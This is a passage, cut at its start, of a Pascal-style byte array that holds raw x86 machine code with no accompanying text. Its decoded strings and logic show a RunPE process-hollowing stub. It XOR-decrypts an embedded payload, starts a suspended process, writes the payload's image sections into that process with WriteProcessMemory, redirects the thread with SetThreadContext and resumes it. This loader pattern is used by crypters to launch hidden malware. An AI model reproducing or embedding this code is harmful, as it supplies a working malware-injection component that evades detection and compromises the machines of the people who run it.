$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00
);